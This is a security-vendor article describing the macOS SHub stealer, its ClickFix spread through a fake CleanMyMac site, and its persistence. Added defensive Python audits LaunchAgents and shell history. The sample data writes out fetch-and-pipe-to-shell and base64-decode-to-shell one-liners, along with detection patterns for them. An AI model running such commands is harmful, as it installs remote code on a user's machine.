How to remove SHub from infected macOS systems


Also Known As: SHub information stealer


To use the full-featured product, you have to purchase a license for Combo Cleaner. A seven-day free trial is available. Combo Cleaner is owned and operated by RCS LT, the parent company of PCRisk.com.

What kind of malware is SHub?

SHub is an information stealer targeting macOS users. It can extract data from web browsers, cryptocurrency wallets, and other applications. Its distribution involves the use of a fake website and the ClickFix technique. If detected on a device, SHub should be eliminated as soon as possible.


SHub stealer overview

Initially, a loader runs on the victim's device. It checks the system before continuing. One check looks for a Russian keyboard. If it finds one, the malware stops and reports this to the attacker. If the check passes, the loader sends the IP address, hostname, macOS version, and keyboard language to cybercriminals.

Next, the loader downloads a script that imitates a normal macOS password prompt. If the victim types their password, the malware can unlock the Keychain, which stores all saved passwords, Wi-Fi logins, and private keys.

After the password is stolen, SHub scans the infected macOS system for various data. It targets over 10 Chromium-based browsers, including Arc, Brave, Chrome, Chrome Beta, Chrome Canary, Chrome DevTools, Chromium, Edge, Opera, Opera GX, Orion, Sidekick, Vivaldi, and Coccoc. It also targets Firefox, stealing saved passwords, cookies, and autofill data from all profiles.

Furthermore, SHub checks all installed browser extensions. It can steal information from over a hundred known cryptocurrency wallets, including Coinbase Wallet, Exodus Web3, Keplr, MetaMask, Phantom, and Trust Wallet.

SHub also targets desktop crypto wallet apps. It collects data from wallets such as Atomic Wallet, Binance, Bitcoin Core, BlueWallet, Coinomi, Dogecoin Core, Electrum, Exodus, Guarda, Ledger Live, Ledger Wallet, Litecoin Core, Monero, Sparrow, TON Keeper, Trezor Suite, Wasabi, and others.

Additionally, the stealer grabs data from Keychain, iCloud account data, Safari cookies and browsing history, Apple Notes databases, and Telegram session files. It also copies ".zsh_history", ".bash_history", and ".gitconfig" files, which may contain API keys or authentication tokens used by developers.

Other Capabilities

SHub not only steals data, but also modifies certain crypto wallet apps so it can keep stealing information later. If it finds wallets such as Atomic Wallet, Exodus, Ledger Live, Ledger Wallet, or Trezor Suite, it replaces the key app file ("app.asar") with a malicious version. This file runs in the background and keeps the app working normally.

The modified apps then send sensitive data to threat actors, such as wallet passwords, seed phrases, or recovery phrases. Some versions can show fake recovery or security update screens to trick users into entering their seed phrases.

Additionally, SHub plants a backdoor to keep access to the infected device. It creates a background task named "com.google.keystone.agent.plist" to look like Google's legitimate update service. Each time it runs, it starts a hidden script that sends the Mac's unique hardware ID to the server and checks for commands.

This lets attackers remotely control the device until the backdoor is found and removed. To avoid suspicion, SHub displays a fake error message stating that the app is not supported, leading the victim to believe the installation has failed.
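The persistence mechanism described above abuses a LaunchAgent label that Google's Keystone updater legitimately uses, so the file name alone proves nothing; what gives the backdoor away is what the agent actually runs. The following audit function is an added example, not code from the page or from any vendor: it parses a LaunchAgent plist and flags a Keystone-labelled agent whose program lives outside the Keystone install directory, runs a shell interpreter directly, or references a hidden dot-path. The expected Keystone path prefix and both sample plists are assumptions constructed for illustration.

```python
import os
import glob
import plistlib

# Assumed baseline: the real Keystone agent binary lives under this directory
# (adjust to your fleet's known-good layout before relying on it).
EXPECTED_KEYSTONE_PREFIX = "/Library/Google/GoogleSoftwareUpdate/"
SHELL_INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3"}

def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return a list of findings for one LaunchAgent plist (empty list = nothing odd)."""
    try:
        data = plistlib.loads(plist_bytes)
    except Exception as exc:  # a plist that will not parse deserves a look itself
        return [f"unparseable plist: {exc}"]
    label = str(data.get("Label", ""))
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    if not args:
        return ["no ProgramArguments/Program key"]
    program = str(args[0])
    findings = []
    if label.startswith("com.google.keystone") and EXPECTED_KEYSTONE_PREFIX not in program:
        findings.append(f"label {label!r} but program {program!r} is outside the Keystone bundle")
    if program.rsplit("/", 1)[-1] in SHELL_INTERPRETERS:
        findings.append("runs an interpreter directly: " + " ".join(map(str, args)))
    if any("/." in str(a) for a in args):
        findings.append("references a hidden (dot) path")
    return findings

def audit_launch_agent_dirs(dirs=("~/Library/LaunchAgents", "/Library/LaunchAgents")):
    """Audit every .plist in the given directories; returns {path: findings} for flagged files."""
    report = {}
    for d in dirs:
        for path in glob.glob(os.path.join(os.path.expanduser(d), "*.plist")):
            with open(path, "rb") as fh:
                findings = audit_launch_agent(fh.read())
            if findings:
                report[path] = findings
    return report

# Constructed sample imitating the SHub-style agent described above (not a real sample).
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/Users/victim/Library/.cache/.agent.sh</string></array>
  <key>RunAtLoad</key><true/><key>StartInterval</key><integer>300</integer>
</dict></plist>"""

# Constructed sample resembling a legitimate Keystone agent entry (assumed layout).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array><string>/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string></array>
</dict></plist>"""
```

Run `audit_launch_agent_dirs()` on a Mac to review the current user's and system LaunchAgents; any flagged entry should be inspected before being unloaded and deleted.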

Threat Summary:
Name: SHub information stealer
Threat Type: Stealer
Detection Names: Avast (BV:Agent-CAW [Trj]), Combo Cleaner (Trojan.GenericKDZ.116347), ESET-NOD32 (OSX/PSW.Agent.GC Trojan), Kaspersky (HEUR:Trojan-Downloader.OSX.Coins.f), Full List Of Detections (VirusTotal)
Symptoms: Fake system prompts asking for your password, unexpected background activity.
Distribution Methods: Fake websites, ClickFix.
Damage: Monetary loss, unwanted warning pop-ups, slow computer performance, identity theft, account hijacking.
Malware Removal (Windows): To eliminate possible malware infections, scan your computer with legitimate antivirus software. Our security researchers recommend using Combo Cleaner.


Conclusion

SHub is a sophisticated macOS malware that gives attackers long-term, silent access to the victim's Mac and valuable information. Victims of these attacks can experience issues like identity theft, cryptocurrency loss, account hijacking, and other negative outcomes. Thus, it is important to be cautious to avoid the infection.

More examples of malware targeting macOS are Phexia, NovaStealer, and MacSync.

How did SHub infiltrate my device?

Cybercriminals use a fake CleanMyMac website to trick users into thinking they are downloading the legitimate app. Instead of downloading a normal installer, the site tells visitors to open Terminal and paste a command as part of the "installation". The distribution technique used in these attacks is called ClickFix.

When the user runs the command, it downloads a hidden script and executes it, leading to SHub's infiltration.
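Because the ClickFix lure depends on the victim pasting a one-liner into Terminal, the shell history files that SHub itself collects (".zsh_history", ".bash_history") are also the quickest place for a responder to confirm how the infection started. The triage function below is an added example, not code from the page or from any vendor; the regex heuristics and the sample history lines are my own constructions (the domain is a reserved ".invalid" placeholder, not the real lure site).

```python
import os
import re

# Heuristics for a pasted "installer" one-liner: fetch-and-pipe-to-shell,
# decode-and-execute, or a hidden script run from a user-writable path.
# These are constructed heuristics, not indicators taken from the page.
CLICKFIX_PATTERNS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64 decoded then executed": re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"),
    "hidden script executed": re.compile(r"\b(ba|z)?sh\s+(\S*/)?\.[^\s/]+\.sh\b|\bnohup\b.*&\s*$"),
}

def triage_shell_history(lines):
    """Return (line_number, command, reason) for each history entry matching a pattern."""
    hits = []
    for n, raw in enumerate(lines, 1):
        # zsh extended history prefixes entries with ": <epoch>:<duration>;"; strip it.
        cmd = re.sub(r"^:\s*\d+:\d+;", "", raw).strip()
        for reason, pattern in CLICKFIX_PATTERNS.items():
            if pattern.search(cmd):
                hits.append((n, cmd, reason))
                break  # report the first matching reason only
    return hits

def triage_history_files(paths=("~/.zsh_history", "~/.bash_history")):
    """Run the triage over real history files; returns {path: hits} for files with hits."""
    report = {}
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                hits = triage_shell_history(fh.read().splitlines())
            if hits:
                report[full] = hits
    return report

# Constructed sample history in zsh extended format (illustrative, not captured data).
SAMPLE_HISTORY = [
    ": 1700000000:0;git status",
    ": 1700000010:0;brew update",
    ": 1700000020:0;curl -fsSL https://cleanmymac-installer.invalid/get | bash",
    ": 1700000030:0;echo aGVsbG8= | base64 -d | sh",
    ": 1700000040:0;bash /Users/victim/Library/.cache/.agent.sh",
    ": 1700000050:0;ls -la ~/Library/LaunchAgents",
]
```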

How to avoid malware?

Always download apps from official sources or trusted app stores, and avoid pirated software, cracks, or unofficial activators. Keep your operating system and programs up to date and scan your device regularly with trusted security software. Be careful with unexpected emails, messages, or attachments, and only open files or click links when you are sure they are safe.

Ignore suspicious ads, pop-ups, and links on untrustworthy sites, and never allow them to send notifications. If your computer is already infected, we recommend running a scan with Combo Cleaner Antivirus for Windows to automatically eliminate all threats.

The fake site (cleanmymacos[.]org) used to distribute SHub stealer (source: malwarebytes.com):


ClickFix instructions used to spread SHub stealer (source: malwarebytes.com):


Instant automatic malware removal:

Manual threat removal might be a lengthy and complicated process that requires advanced IT skills. Combo Cleaner is a professional automatic malware removal tool that is recommended to get rid of malware. Download it by clicking the button below:



Potentially unwanted applications removal:

Remove potentially unwanted applications from your "Applications" folder:

Manual removal of malicious Mac applications

Click the Finder icon. In the Finder window, select "Applications". In the Applications folder, look for "MPlayerX", "NicePlayer", or other suspicious applications and drag them to the Trash. After removing the potentially unwanted application(s) that cause online ads, scan your Mac for any remaining unwanted components.


Frequently Asked Questions (FAQ)

My computer is infected with SHub malware, should I format my storage device to get rid of it?

This step will eliminate SHub, but it will also delete all data, so it should only be used as a last resort. Before taking this action, it is best to perform a full scan with reliable security software, such as Combo Cleaner.

What are the biggest issues that malware can cause?

Malware can give attackers remote access, steal personal information, install more malicious programs, delete or encrypt files, cause system crashes, slow down your device, and carry out other harmful activities.

What is the purpose of SHub?

SHub is malware that steals passwords, crypto wallets, and other sensitive data from macOS. It targets browsers, the Keychain, desktop and browser-based crypto wallets, and files like Apple Notes or Telegram sessions. Its main goal is to harvest information.

How did SHub infiltrate my device?

Attackers use a fake CleanMyMac website, which instructs visitors to open Terminal and paste a command to "install" the software. This delivery method is known as ClickFix. When the user runs the command, it silently downloads and runs a hidden script, allowing SHub to infect the Mac.

Will Combo Cleaner protect me from malware?

Yes, Combo Cleaner can detect and remove most known malware. However, advanced malware often hides deep within the system, so it is important to run a complete system scan.

Tomas Meskauskas

Expert security researcher, professional malware analyst

I am passionate about computer security and technology. I have an experience of over 10 years working in various companies related to computer technical issue solving and Internet security. I have been working as an author and editor for pcrisk.com since 2010. Follow me on Twitter and LinkedIn to stay informed about the latest online security threats.


The PCrisk security portal is brought to you by the company RCS LT.

Our security researchers work together to educate computer users about the latest online security threats. More information about the company RCS LT.
